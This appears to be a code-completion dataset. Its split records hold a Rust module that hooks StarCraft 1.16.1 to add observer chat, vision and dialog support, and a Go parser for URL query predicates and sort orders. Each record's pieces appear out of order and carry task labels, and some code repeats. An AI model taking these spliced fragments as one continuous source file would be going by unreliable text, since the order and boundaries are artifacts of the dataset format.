use crate::bw;
use crate::bw_1161::{self, vars};
pub unsafe fn process_commands_hook(
data: *const u8,
len: u32,
replay: u32,
orig: unsafe extern fn(*const u8, u32, u32),
) {
if replay == 0 && *vars::current_command_player >= 8 {
// Replace anything sent by observers with a keep alive command, I'm quite sure there will
// be buffer overflows otherwise.
let buf = [0x05u8];
orig(buf.as_ptr(), 1, replay);
} else {
orig(data, len, replay);
}
}
// Don't validate sync commands when observing. As the sync contains visibility info, observers
// are out of sync from everyone else, as their vision settings are not sent to other players.
pub unsafe fn sync_command_hook(
data: *const u8,
orig: unsafe extern fn(*const u8) -> u32,
) -> u32 {
if is_local_player_observer() {
1
} else {
orig(data)
}
}
pub unsafe fn chat_message_hook(
storm_player: u32,
message: *const u8,
length: u32,
orig: unsafe extern fn(u32, *const u8, u32) -> u32,
) -> u32 {
use std::io::Write;
if vars::storm_id_to_human_id[storm_player as usize] >= 8 {
// Observer message, we'll have to manually print text and add to replay recording.
let message = std::slice::from_raw_parts(message, length as usize);
// The length should include null byte
if message.last() != Some(&0) {
return 0;
}
// There's some unnecessary control information at the start of message
let text = match message.get(2..(message.len() - 1)) {
Some(s) => s,
None => return 0,
};
let mut buf = [0; 512];
let format = |mut pos: &mut [u8], msg_color: u8| -> Result<(), std::io::Error> {
// Write "\x1f{player}: \x02{message}"
// 0x1f is the neutral cyan color and 0x02 is the regular chat message one.
write!(&mut pos, "\x1f")?;
let name = CStr::from_ptr(
vars::storm_players[storm_player as usize].name.as_ptr() as *const i8
);
pos.write_all(name.to_bytes())?;
write!(&mut pos, ": ")?;
pos.write_all(&[msg_color])?;
pos.write_all(text)?;
Ok(())
};
let _ = format(&mut buf[..], 0x02);
let mut replay_command = [0u8; 0x52];
replay_command[0] = 0x5c; // Replay chat
replay_command[1] = 0x8; // Player
let _ = (&mut replay_command[2..]).write(&buf[..]);
replay_command[0x51] = 0;
bw_1161::add_to_replay_data(
*vars::replay_data,
replay_command.as_ptr(),
replay_command.len() as u32,
storm_player,
);
if storm_player == *vars::local_storm_id {
// Switch the message to be green to show it's player's own message
let _ = format(&mut buf[..], 0x07);
}
bw_1161::display_message(buf.as_ptr(), 0);
return length;
} else {
orig(storm_player, message, length)
}
}
pub unsafe fn load_dialog_hook(
dialog: *mut bw::Dialog,
base: *mut c_void,
event_handler: *mut c_void,
source_file: *const u8,
source_line: u32,
orig: unsafe extern fn(*mut bw::Dialog, *mut c_void, *mut c_void, *const u8, u32),
) {
orig(dialog, base, event_handler, source_file, source_line);
if !is_local_player_observer() {
return;
}
let name = CStr::from_ptr((*dialog).control.string as *const i8).to_bytes();
if name == b"TextBox" {
if let Some(to_allies) = find_dialog_child(dialog, 0x2) {
(*to_allies).string = b"To Observers:\0".as_ptr();
// Of course the control has to be resized by hand <.<
// Possibly could also just make it left aligned.
// This can be determined "easily" by breaking 1.16.1 in debugger at 004F2FFF when
// opening chat entry while talking to one player, and replacing the "To player:"
// string, and stepping over the call.
(*to_allies).area.right = 0x55;
} else {
error!("Couldn't find 'To Allies:' control");
}
} else if name == b"MsgFltr" {
if let Some(to_allies) = find_dialog_child(dialog, 0x3) {
(*to_allies).string = b"Send to observers\0".as_ptr();
} else {
error!("Couldn't find 'Send to allies' control");
}
}
}
pub unsafe fn init_ui_variables_hook(orig: unsafe extern fn()) {
orig();
if is_local_player_observer() {
*vars::replay_visions = 0xff;
*vars::player_visions = 0xff;
// To allies (=observers)
(*vars::game).chat_dialog_recipient = 9;
// Could also set the race, it currently just does an overflow read to zerg.
}
}
pub unsafe fn cmdbtn_event_handler_hook(
control: *mut bw::Control,
event: *mut bw::UiEvent,
orig: unsafe extern fn(*mut bw::Control, *mut bw::UiEvent) -> u32,
) -> u32 {
if !is_local_player_observer() {
orig(control, event)
} else {
// Disable clicking on command buttons.
// Event 4 = Left click, 6 = Double click, Extended 3 = Hotkey
if (*event).ty == 0x4 || (*event).ty == 0x6 {
0
} else if (*event).ty == 0xe && (*event).extended_type == 3 {
1
} else {
orig(control, event)
}
}
}
pub unsafe fn get_gluall_string_hook(
string_id: u32,
orig: unsafe extern fn(u32) -> *const u8,
) -> *const u8 {
// Replace "Replay players" text in the alliance dialog when observing
if string_id == 0xb6 && is_local_player_observer() {
"Players\0".as_ptr()
} else {
orig(string_id)
}
}
pub unsafe fn update_net_timeout_players(orig: unsafe extern fn()) {
unsafe fn find_timeout_dialog_player_label(bw_player: u8) -> Option<*mut bw::Control> {
if (*vars::timeout_bin).is_null() {
return None;
}
let mut label = find_dialog_child(*vars::timeout_bin, -10)?;
let mut label_count = 0;
while !label.is_null() && label_count < 8 {
// Flag 0x8 == Shown
if (*label).flags & 0x8 != 0 && (*label).user_ptr as usize == bw_player as usize {
return Some(label);
}
label = (*label).next;
label_count += 1;
}
None
}
// To make observers appear in network timeout dialog, we temporarily write their info to
// ingame player structure, and revert the change after this function has been called.
let bw_players: &mut [bw::Player] = &mut vars::players[..8];
let actual_players: [bw::Player; 8] = {
let mut players: [bw::Player; 8] = mem::zeroed();
for i in 0..players.len() {
players[i] = bw_players[i].clone();
}
players
};
let mut overwritten_player_id_to_storm = [None; 8];
for storm_id in 0..8 {
let is_obs = !actual_players.iter().any(|x| x.storm_id == storm_id);
if is_obs {
match bw_players
.iter()
.position(|x| x.player_type != bw::PLAYER_TYPE_HUMAN)
{
Some(pos) => {
overwritten_player_id_to_storm[pos] = Some(storm_id);
bw_players[pos].storm_id = storm_id;
bw_players[pos].player_type = bw::PLAYER_TYPE_HUMAN;
}
None => {
error!(
"Net timeout dialog: Out of player slots for observer, storm id {}",
storm_id
);
}
}
}
}
orig();
for bw_player in 0..8 {
if let Some(storm_id) = overwritten_player_id_to_storm[bw_player] {
if let Some(ctrl) = find_timeout_dialog_player_label(bw_player as u8) {
// We need to redirect the name string to the storm player string, and replace the
// player value to unused player 10, whose color will be set to neutral resource
// color. (The neutral player 11 actually can have a different color for neutral
// buildings)
//
// Technically player 10 can actually have units in some odd UMS maps, but we
// aren't allowing observing UMS games anyways, so whatever. Even if the someone
// noticed the color changing, I doubt they would care.
(*ctrl).string = vars::storm_players[storm_id as usize].name.as_ptr();
(*ctrl).user_ptr = 10usize as *mut c_void;
(*vars::game).player_minimap_color[10] = *vars::resource_minimap_color;
}
}
}
for (i, player) in actual_players.iter().enumerate() {
vars::players[i] = player.clone();
}
}
pub unsafe fn update_command_card_hook(orig: unsafe extern fn()) {
if is_local_player_observer() && !(*vars::primary_selected).is_null() {
*vars::local_nation_id = (**vars::primary_selected).player as u32;
orig();
*vars::local_nation_id = !0;
} else {
orig();
}
}
pub unsafe fn draw_command_button_hook(
control: *mut bw::Control,
x: i32,
y: i32,
area: *mut c_void,
orig: unsafe extern fn(*mut bw::Control, i32, i32, *mut c_void),
) {
// Need to disable replay flag being set from DrawScreenHook if observing
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 0;
}
orig(control, x, y, area);
*vars::is_replay = was_replay;
}
pub unsafe fn center_screen_on_start_location(
unit: *mut bw::PreplacedUnit,
other: *mut c_void,
orig: unsafe extern fn(*mut bw::PreplacedUnit, *mut c_void) -> u32,
) -> u32 {
let was_replay = *vars::is_replay;
if is_local_player_observer() && vars::players[(*unit).player as usize].player_type != 0 {
// Center the screen once we get the first active player so observers don't randomly
// end up staring at unused start location.
*vars::is_replay = 1;
}
let result = orig(unit, other);
*vars::is_replay = was_replay;
result
}
unsafe fn find_dialog_child(dialog: *mut bw::Dialog, child_id: i16) -> Option<*mut bw::Control> {
let mut control = (*dialog).first_child;
while !control.is_null() {
if (*control).id == child_id {
return Some(control);
}
control = (*control).next; | unsafe fn is_local_player_observer() -> bool {
// Should probs use shieldbattery's data instead of checking BW variables,
// but we don't have anything that's readily accessible by game thread.
*vars::local_nation_id == !0
}
pub unsafe fn with_replay_flag_if_obs<F: FnOnce() -> R, R>(func: F) -> R {
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 1;
}
let ret = func();
*vars::is_replay = was_replay;
ret
} | }
None
}
| random_line_split |
observing.rs | use std::ffi::CStr;
use std::mem;
use libc::c_void;
use crate::bw;
use crate::bw_1161::{self, vars};
pub unsafe fn process_commands_hook(
data: *const u8,
len: u32,
replay: u32,
orig: unsafe extern fn(*const u8, u32, u32),
) {
if replay == 0 && *vars::current_command_player >= 8 {
// Replace anything sent by observers with a keep alive command, I'm quite sure there will
// be buffer overflows otherwise.
let buf = [0x05u8];
orig(buf.as_ptr(), 1, replay);
} else {
orig(data, len, replay);
}
}
// Don't validate sync commands when observing. As the sync contains visibility info, observers
// are out of sync from everyone else, as their vision settings are not sent to other players.
pub unsafe fn sync_command_hook(
data: *const u8,
orig: unsafe extern fn(*const u8) -> u32,
) -> u32 {
if is_local_player_observer() {
1
} else {
orig(data)
}
}
pub unsafe fn chat_message_hook(
storm_player: u32,
message: *const u8,
length: u32,
orig: unsafe extern fn(u32, *const u8, u32) -> u32,
) -> u32 {
use std::io::Write;
if vars::storm_id_to_human_id[storm_player as usize] >= 8 {
// Observer message, we'll have to manually print text and add to replay recording.
let message = std::slice::from_raw_parts(message, length as usize);
// The length should include null byte
if message.last() != Some(&0) {
return 0;
}
// There's some unnecessary control information at the start of message
let text = match message.get(2..(message.len() - 1)) {
Some(s) => s,
None => return 0,
};
let mut buf = [0; 512];
let format = |mut pos: &mut [u8], msg_color: u8| -> Result<(), std::io::Error> {
// Write "\x1f{player}: \x02{message}"
// 0x1f is the neutral cyan color and 0x02 is the regular chat message one.
write!(&mut pos, "\x1f")?;
let name = CStr::from_ptr(
vars::storm_players[storm_player as usize].name.as_ptr() as *const i8
);
pos.write_all(name.to_bytes())?;
write!(&mut pos, ": ")?;
pos.write_all(&[msg_color])?;
pos.write_all(text)?;
Ok(())
};
let _ = format(&mut buf[..], 0x02);
let mut replay_command = [0u8; 0x52];
replay_command[0] = 0x5c; // Replay chat
replay_command[1] = 0x8; // Player
let _ = (&mut replay_command[2..]).write(&buf[..]);
replay_command[0x51] = 0;
bw_1161::add_to_replay_data(
*vars::replay_data,
replay_command.as_ptr(),
replay_command.len() as u32,
storm_player,
);
if storm_player == *vars::local_storm_id {
// Switch the message to be green to show it's player's own message
let _ = format(&mut buf[..], 0x07);
}
bw_1161::display_message(buf.as_ptr(), 0);
return length;
} else {
orig(storm_player, message, length)
}
}
pub unsafe fn load_dialog_hook(
dialog: *mut bw::Dialog,
base: *mut c_void,
event_handler: *mut c_void,
source_file: *const u8,
source_line: u32,
orig: unsafe extern fn(*mut bw::Dialog, *mut c_void, *mut c_void, *const u8, u32),
) {
orig(dialog, base, event_handler, source_file, source_line);
if !is_local_player_observer() {
return;
}
let name = CStr::from_ptr((*dialog).control.string as *const i8).to_bytes();
if name == b"TextBox" {
if let Some(to_allies) = find_dialog_child(dialog, 0x2) {
(*to_allies).string = b"To Observers:\0".as_ptr();
// Of course the control has to be resized by hand <.<
// Possibly could also just make it left aligned.
// This can be determined "easily" by breaking 1.16.1 in debugger at 004F2FFF when
// opening chat entry while talking to one player, and replacing the "To player:"
// string, and stepping over the call.
(*to_allies).area.right = 0x55;
} else {
error!("Couldn't find 'To Allies:' control");
}
} else if name == b"MsgFltr" {
if let Some(to_allies) = find_dialog_child(dialog, 0x3) {
(*to_allies).string = b"Send to observers\0".as_ptr();
} else {
error!("Couldn't find 'Send to allies' control");
}
}
}
pub unsafe fn init_ui_variables_hook(orig: unsafe extern fn()) {
orig();
if is_local_player_observer() {
*vars::replay_visions = 0xff;
*vars::player_visions = 0xff;
// To allies (=observers)
(*vars::game).chat_dialog_recipient = 9;
// Could also set the race, it currently just does an overflow read to zerg.
}
}
pub unsafe fn cmdbtn_event_handler_hook(
control: *mut bw::Control,
event: *mut bw::UiEvent,
orig: unsafe extern fn(*mut bw::Control, *mut bw::UiEvent) -> u32,
) -> u32 {
if !is_local_player_observer() {
orig(control, event)
} else {
// Disable clicking on command buttons.
// Event 4 = Left click, 6 = Double click, Extended 3 = Hotkey
if (*event).ty == 0x4 || (*event).ty == 0x6 {
0
} else if (*event).ty == 0xe && (*event).extended_type == 3 {
1
} else {
orig(control, event)
}
}
}
pub unsafe fn get_gluall_string_hook(
string_id: u32,
orig: unsafe extern fn(u32) -> *const u8,
) -> *const u8 {
// Replace "Replay players" text in the alliance dialog when observing
if string_id == 0xb6 && is_local_player_observer() {
"Players\0".as_ptr()
} else {
orig(string_id)
}
}
pub unsafe fn update_net_timeout_players(orig: unsafe extern fn()) {
unsafe fn find_timeout_dialog_player_label(bw_player: u8) -> Option<*mut bw::Control> {
if (*vars::timeout_bin).is_null() {
return None;
}
let mut label = find_dialog_child(*vars::timeout_bin, -10)?;
let mut label_count = 0;
while !label.is_null() && label_count < 8 {
// Flag 0x8 == Shown
if (*label).flags & 0x8 != 0 && (*label).user_ptr as usize == bw_player as usize {
return Some(label);
}
label = (*label).next;
label_count += 1;
}
None
}
// To make observers appear in network timeout dialog, we temporarily write their info to
// ingame player structure, and revert the change after this function has been called.
let bw_players: &mut [bw::Player] = &mut vars::players[..8];
let actual_players: [bw::Player; 8] = {
let mut players: [bw::Player; 8] = mem::zeroed();
for i in 0..players.len() {
players[i] = bw_players[i].clone();
}
players
};
let mut overwritten_player_id_to_storm = [None; 8];
for storm_id in 0..8 {
let is_obs = !actual_players.iter().any(|x| x.storm_id == storm_id);
if is_obs {
match bw_players
.iter()
.position(|x| x.player_type != bw::PLAYER_TYPE_HUMAN)
{
Some(pos) => {
overwritten_player_id_to_storm[pos] = Some(storm_id);
bw_players[pos].storm_id = storm_id;
bw_players[pos].player_type = bw::PLAYER_TYPE_HUMAN;
}
None => {
error!(
"Net timeout dialog: Out of player slots for observer, storm id {}",
storm_id
);
}
}
}
}
orig();
for bw_player in 0..8 {
if let Some(storm_id) = overwritten_player_id_to_storm[bw_player] {
if let Some(ctrl) = find_timeout_dialog_player_label(bw_player as u8) |
}
}
for (i, player) in actual_players.iter().enumerate() {
vars::players[i] = player.clone();
}
}
pub unsafe fn update_command_card_hook(orig: unsafe extern fn()) {
if is_local_player_observer() && !(*vars::primary_selected).is_null() {
*vars::local_nation_id = (**vars::primary_selected).player as u32;
orig();
*vars::local_nation_id = !0;
} else {
orig();
}
}
pub unsafe fn draw_command_button_hook(
control: *mut bw::Control,
x: i32,
y: i32,
area: *mut c_void,
orig: unsafe extern fn(*mut bw::Control, i32, i32, *mut c_void),
) {
// Need to disable replay flag being set from DrawScreenHook if observing
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 0;
}
orig(control, x, y, area);
*vars::is_replay = was_replay;
}
pub unsafe fn center_screen_on_start_location(
unit: *mut bw::PreplacedUnit,
other: *mut c_void,
orig: unsafe extern fn(*mut bw::PreplacedUnit, *mut c_void) -> u32,
) -> u32 {
let was_replay = *vars::is_replay;
if is_local_player_observer() && vars::players[(*unit).player as usize].player_type != 0 {
// Center the screen once we get the first active player so observers don't randomly
// end up staring at unused start location.
*vars::is_replay = 1;
}
let result = orig(unit, other);
*vars::is_replay = was_replay;
result
}
unsafe fn find_dialog_child(dialog: *mut bw::Dialog, child_id: i16) -> Option<*mut bw::Control> {
let mut control = (*dialog).first_child;
while !control.is_null() {
if (*control).id == child_id {
return Some(control);
}
control = (*control).next;
}
None
}
unsafe fn is_local_player_observer() -> bool {
// Should probs use shieldbattery's data instead of checking BW variables,
// but we don't have anything that's readily accessible by game thread.
*vars::local_nation_id == !0
}
pub unsafe fn with_replay_flag_if_obs<F: FnOnce() -> R, R>(func: F) -> R {
let was_replay = *vars::is_replay;
if is_local_player_observer() {
*vars::is_replay = 1;
}
let ret = func();
*vars::is_replay = was_replay;
ret
}
| {
// We need to redirect the name string to the storm player string, and replace the
// player value to unused player 10, whose color will be set to neutral resource
// color. (The neutral player 11 actually can have a different color for neutral
// buildings)
//
// Technically player 10 can actually have units in some odd UMS maps, but we
// aren't allowing observing UMS games anyways, so whatever. Even if the someone
// noticed the color changing, I doubt they would care.
(*ctrl).string = vars::storm_players[storm_id as usize].name.as_ptr();
(*ctrl).user_ptr = 10usize as *mut c_void;
(*vars::game).player_minimap_color[10] = *vars::resource_minimap_color;
} | conditional_block |
parser.go | package queryme
import (
"fmt"
"errors"
"net/url"
"strconv"
"strings"
"time"
"unicode/utf8"
)
/*
predicates = predicate *("," predicate)
predicate = (not / and / or / eq / lt / le / gt / ge)
not = "not" "(" predicate ")"
and = "and" "(" predicates ")"
or = "or" "(" predicates ")"
eq = "eq" "(" field "," values ")"
lt = "lt" "(" field "," value ")"
le = "le" "(" field "," value ")"
gt = "gt" "(" field "," value ")"
ge = "ge" "(" field "," value ")"
fts = "fts" "(" field "," string ")"
values = value *("," value)
value = (null / boolean / number / string / date)
null = "null"
boolean = "true" / "false"
number = 1*(DIGIT / "." / "e" / "E" / "+" / "-")
string = "$" *(unreserved / pct-encoded)
date = 4DIGIT "-" 2DIGIT "-" 2DIGIT *1("T" 2DIGIT ":" 2DIGIT ":" 2DIGIT *1("." 3DIGIT) "Z")
fieldorders = *1(fieldorder *("," fieldorder))
fieldorder = *1"!" field
field = *(unreserved / pct-encoded)
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
pct-encoded = "%" HEXDIG HEXDIG
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="
pchar = unreserved / pct-encoded / sub-delims / ":" / "@"
query = *( pchar / "/" / "?" )
*/
var (
SortOrderSeparatorExpected error = errors.New("Expected seperator ',' after sorted order.")
IdentifierExpected error = errors.New("Expected identifier.")
ValueExpected error = errors.New("Expected value.")
EndOfStringExpected error = errors.New("Expected end of string.")
StringExpected error = errors.New("Expected string.")
OperatorExpected error = errors.New("Expected operator.")
UnexpectedEndOfPredicate error = errors.New("Unexpected end of predicate.")
UnexpectedEndOfSortOrders error = errors.New("Unexpected end of sort orders.")
characters []byte
)
func init() {
characters = make([]byte, 128)
characters[int('=')] = 1
characters[int('&')] = 1
characters[int('!')] = 2
characters[int('\'')] = 2
characters[int('(')] = 2
characters[int(')')] = 2
characters[int('*')] = 2
characters[int(',')] = 2
characters[int(';')] = 2
characters[int('/')] = 2
characters[int('?')] = 2
characters[int('@')] = 2
characters[int('$')] = 3
characters[int('+')] = 3
characters[int(':')] = 3
// 'pct-encoded' characters
characters[int('%')] = 4
// 'unreserved' characters
characters[int('-')] = 5
characters[int('.')] = 5
characters[int('_')] = 5
characters[int('~')] = 5
for i := int('0'); i <= int('9'); i++ {
characters[i] = 5
}
for i := int('a'); i <= int('z'); i++ {
characters[i] = 5
}
for i := int('A'); i <= int('Z'); i++ {
characters[i] = 5
}
}
func firstCharClass(s string) byte {
r, _ := utf8.DecodeRuneInString(s)
if r > 127 {
return 0
} else {
return characters[r]
}
}
func charClassDetector(min byte, max byte) func(r rune) bool {
return func(r rune) bool {
i := int(r)
if i > 127 {
return false
}
c := characters[i]
return c >= min && c <= max
}
}
// QueryString is a parsed query part of a URL.
type QueryString struct {
fields map[string]string
}
// NewFromRawQuery creates a new QueryString from a raw query string.
func NewFromRawQuery(rawQuery string) *QueryString {
qs := new(QueryString)
qs.fields = make(map[string]string)
for {
i := strings.IndexRune(rawQuery, '=')
if i == -1 {
break
}
name := rawQuery[:i]
rawQuery = rawQuery[i+1:]
i = strings.IndexFunc(rawQuery, charClassDetector(1, 1))
var value string
if i == -1 {
value = rawQuery
} else {
value = rawQuery[:i]
rawQuery = rawQuery[i+1:]
}
qs.fields[name] = value
if i == -1 {
break
}
}
return qs
}
// NewFromRawQuery creates a new QueryString from an existing URL object.
func NewFromURL(url *url.URL) *QueryString {
return NewFromRawQuery(url.RawQuery)
}
// Tests if specified name has been found in query string.
func (q *QueryString) Contains(name string) bool {
_, ok := q.fields[name]
return ok
}
// Returns raw query string value.
func (q *QueryString) Raw(name string) (string, bool) {
v, ok := q.fields[name]
return v, ok
}
// Predicate parses the given component of the query as a predicate, then returns it.
func (q *QueryString) Predicate(name string) (p Predicate, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
p, raw = parsePredicate(raw)
if len(raw) != 0 {
p = nil
err = UnexpectedEndOfPredicate
}
return
}
// Predicate parses the given component of the query as a sort order, then returns it.
func (q *QueryString) SortOrder(name string) (os []*SortOrder, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
os, raw = parseSortOrders(raw)
if len(raw) != 0 {
os = nil
err = UnexpectedEndOfSortOrders
}
return
}
func | (s string) (p Predicate, n string) {
if len(s) == 0 {
panic(OperatorExpected)
}
var op string
op, n = parseIdentifier(s)
n = parseLiteral(n, "(")
var f string
var ps []Predicate
var vs []Value
var v Value
switch op {
case "not":
var operand Predicate
operand, n = parsePredicate(n)
p = Not{operand}
case "and":
ps, n = parsePredicates(n)
p = And(ps)
case "or":
ps, n = parsePredicates(n)
p = Or(ps)
case "eq":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
vs, n = parseValues(n)
p = Eq{Field(f), vs}
case "gt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Gt{Field(f), v}
case "ge":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Ge{Field(f), v}
case "lt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Lt{Field(f), v}
case "le":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Le{Field(f), v}
case "fts":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
s, n = parseString(n)
p = Fts{Field(f), s}
default:
panic(fmt.Errorf("Invalid operator: %q", op))
}
n = parseLiteral(n, ")")
return
}
func parsePredicates(s string) (ps []Predicate, n string) {
ps = make([]Predicate, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand Predicate
operand, n = parsePredicate(n)
ps = append(ps, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func ParseValues(s string) ([]Value, error) {
vs, n := parseValues(s)
if n != "" {
return vs, EndOfStringExpected
}
return vs, nil
}
func parseValues(s string) (vs []Value, n string) {
vs = make([]Value, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand interface{}
operand, n = parseValue(n)
vs = append(vs, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func parseString(s string) (v string, n string) {
if len(s) == 0 || s[0] != '$' {
panic(StringExpected)
}
s = s[1:]
l := strings.IndexFunc(s, charClassDetector(1, 2))
if l == -1 {
l = len(s)
}
var err error
if v, err = url.QueryUnescape(s[:l]); err != nil {
panic(err)
}
n = s[l:]
return
}
func ParseValue(s string) (Value, error) {
v, n := parseValue(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseValue(s string) (v Value, n string) {
if len(s) == 0 {
panic(ValueExpected)
}
r, l := utf8.DecodeRuneInString(s)
switch(r) {
case 'n':
n = parseLiteral(s, "null")
v = nil
case 't':
n = parseLiteral(s, "true")
v = true
case 'f':
n = parseLiteral(s, "false")
v = false
case '$':
v, n = parseString(s)
default:
if l = strings.IndexFunc(s, charClassDetector(1, 2)); l == -1 {
l = len(s)
}
if (l == 10 || ((l == 20 || (l == 24 && s[19] == '.')) && s[10] == 'T' && s[13] == ':' && s[16] == ':' && s[l-1] == 'Z')) && s[4] == '-' && s[7] == '-' {
var err error
var yr, mo, dy, hr, mn, sc, ms int64 = 0, 0, 0, 0, 0, 0, 0
if yr, err = strconv.ParseInt(s[0:4], 10, 32); err != nil {
panic(err)
}
if mo, err = strconv.ParseInt(s[5:7], 10, 32); err != nil {
panic(err)
}
if dy, err = strconv.ParseInt(s[8:10], 10, 32); err != nil {
panic(err)
}
if l >= 20 {
if hr, err = strconv.ParseInt(s[11:13], 10, 32); err != nil {
panic(err)
}
if mn, err = strconv.ParseInt(s[14:16], 10, 32); err != nil {
panic(err)
}
if sc, err = strconv.ParseInt(s[17:19], 10, 32); err != nil {
panic(err)
}
if l == 24 {
if ms, err = strconv.ParseInt(s[20:23], 10, 32); err != nil {
panic(err)
}
}
}
v = time.Date(int(yr), time.Month(mo), int(dy), int(hr), int(mn), int(sc), int(ms) * 1000000, time.UTC)
} else {
if f, err := strconv.ParseFloat(s[:l], 64); err != nil {
panic(err)
} else {
v = f
}
}
n = s[l:]
}
return
}
func parseLiteral(s string, expected string) (n string) {
if len(s) < len(expected) || s[:len(expected)] != expected {
panic(fmt.Errorf("expected: %q", expected))
}
return s[len(expected):]
}
func parseSortOrders(s string) (os []*SortOrder, n string) {
os = make([]*SortOrder, 0, 4)
if len(s) > 0 {
for {
var o *SortOrder
o, s = parseSortOrder(s)
os = append(os, o)
if len(s) == 0 {
break
}
if r, l := utf8.DecodeRuneInString(s); r != ',' {
panic(SortOrderSeparatorExpected)
} else {
s = s[l:]
}
}
}
n = s
return
}
func parseSortOrder(s string) (o *SortOrder, n string) {
o = new(SortOrder)
if r, _ := utf8.DecodeRuneInString(s); r == '!' {
s = s[1:]
} else {
o.Ascending = true
}
f, n := parseIdentifier(s)
o.Field = Field(f)
return
}
func ParseIdentifier(s string) (Value, error) {
v, n := parseIdentifier(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseIdentifier(s string) (id string, n string) {
if len(s) == 0 {
panic(IdentifierExpected)
}
i := strings.IndexFunc(s, charClassDetector(1, 3))
if i == 0 {
panic(IdentifierExpected)
}
if i == -1 {
n = ""
} else {
n = s[i:]
s = s[:i]
}
var err error
if id, err = url.QueryUnescape(s); err != nil {
panic(err)
}
return
}
| parsePredicate | identifier_name |
parser.go | package queryme
import (
"fmt"
"errors"
"net/url"
"strconv"
"strings"
"time"
"unicode/utf8"
)
/*
predicates = predicate *("," predicate)
predicate = (not / and / or / eq / lt / le / gt / ge)
not = "not" "(" predicate ")"
and = "and" "(" predicates ")"
or = "or" "(" predicates ")"
eq = "eq" "(" field "," values ")"
lt = "lt" "(" field "," value ")"
le = "le" "(" field "," value ")"
gt = "gt" "(" field "," value ")"
ge = "ge" "(" field "," value ")"
fts = "fts" "(" field "," string ")"
values = value *("," value)
value = (null / boolean / number / string / date)
null = "null"
boolean = "true" / "false"
number = 1*(DIGIT / "." / "e" / "E" / "+" / "-")
string = "$" *(unreserved / pct-encoded)
date = 4DIGIT "-" 2DIGIT "-" 2DIGIT *1("T" 2DIGIT ":" 2DIGIT ":" 2DIGIT *1("." 3DIGIT) "Z")
fieldorders = *1(fieldorder *("," fieldorder))
fieldorder = *1"!" field
field = *(unreserved / pct-encoded)
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
pct-encoded = "%" HEXDIG HEXDIG
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="
pchar = unreserved / pct-encoded / sub-delims / ":" / "@"
query = *( pchar / "/" / "?" )
*/
var (
SortOrderSeparatorExpected error = errors.New("Expected seperator ',' after sorted order.")
IdentifierExpected error = errors.New("Expected identifier.")
ValueExpected error = errors.New("Expected value.")
EndOfStringExpected error = errors.New("Expected end of string.")
StringExpected error = errors.New("Expected string.")
OperatorExpected error = errors.New("Expected operator.")
UnexpectedEndOfPredicate error = errors.New("Unexpected end of predicate.")
UnexpectedEndOfSortOrders error = errors.New("Unexpected end of sort orders.")
characters []byte
)
func init() {
characters = make([]byte, 128)
characters[int('=')] = 1
characters[int('&')] = 1
characters[int('!')] = 2
characters[int('\'')] = 2
characters[int('(')] = 2
characters[int(')')] = 2
characters[int('*')] = 2
characters[int(',')] = 2
characters[int(';')] = 2
characters[int('/')] = 2
characters[int('?')] = 2
characters[int('@')] = 2
characters[int('$')] = 3
characters[int('+')] = 3
characters[int(':')] = 3
// 'pct-encoded' characters
characters[int('%')] = 4
// 'unreserved' characters
characters[int('-')] = 5
characters[int('.')] = 5
characters[int('_')] = 5
characters[int('~')] = 5
for i := int('0'); i <= int('9'); i++ {
characters[i] = 5
}
for i := int('a'); i <= int('z'); i++ {
characters[i] = 5
}
for i := int('A'); i <= int('Z'); i++ {
characters[i] = 5
}
}
func firstCharClass(s string) byte {
r, _ := utf8.DecodeRuneInString(s)
if r > 127 {
return 0
} else {
return characters[r]
}
}
func charClassDetector(min byte, max byte) func(r rune) bool {
return func(r rune) bool {
i := int(r)
if i > 127 {
return false
}
c := characters[i]
return c >= min && c <= max
}
}
// QueryString is a parsed query part of a URL.
type QueryString struct {
fields map[string]string
}
// NewFromRawQuery creates a new QueryString from a raw query string.
func NewFromRawQuery(rawQuery string) *QueryString {
qs := new(QueryString)
qs.fields = make(map[string]string)
for {
i := strings.IndexRune(rawQuery, '=')
if i == -1 {
break
}
name := rawQuery[:i]
rawQuery = rawQuery[i+1:]
i = strings.IndexFunc(rawQuery, charClassDetector(1, 1))
var value string
if i == -1 {
value = rawQuery
} else {
value = rawQuery[:i]
rawQuery = rawQuery[i+1:]
}
qs.fields[name] = value
if i == -1 {
break
}
}
return qs
}
// NewFromRawQuery creates a new QueryString from an existing URL object.
func NewFromURL(url *url.URL) *QueryString {
return NewFromRawQuery(url.RawQuery)
}
// Tests if specified name has been found in query string.
func (q *QueryString) Contains(name string) bool {
_, ok := q.fields[name]
return ok
}
// Returns raw query string value.
func (q *QueryString) Raw(name string) (string, bool) {
v, ok := q.fields[name]
return v, ok
}
// Predicate parses the given component of the query as a predicate, then returns it.
func (q *QueryString) Predicate(name string) (p Predicate, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
